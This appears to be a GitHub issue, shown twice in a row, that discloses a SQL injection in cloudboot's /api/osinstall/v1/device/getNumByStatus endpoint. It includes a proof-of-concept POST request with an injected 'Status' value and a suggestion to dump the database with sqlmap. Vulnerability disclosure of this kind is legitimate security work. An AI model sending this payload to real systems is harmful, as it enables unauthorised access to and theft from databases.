A sql injection was discovered in cloudboot
There is a sql injection vulnerability which allows remote attackers to inject sql command of /api/osinstall/v1/device/getNumByStatus
PoC:
POST /api/osinstall/v1/device/getNumByStatus HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
{"Status":"1'order by 2#","UserID":0}
"Status" is the injection point
Use sqlmap to get the database
The text was updated successfully, but these errors were encountered:
A sql injection was discovered in cloudboot
There is a sql injection vulnerability which allows remote attackers to inject sql command of /api/osinstall/v1/device/getNumByStatus
PoC:
POST /api/osinstall/v1/device/getNumByStatus HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
{"Status":"1'order by 2#","UserID":0}
"Status" is the injection point
Use sqlmap to get the database

The text was updated successfully, but these errors were encountered: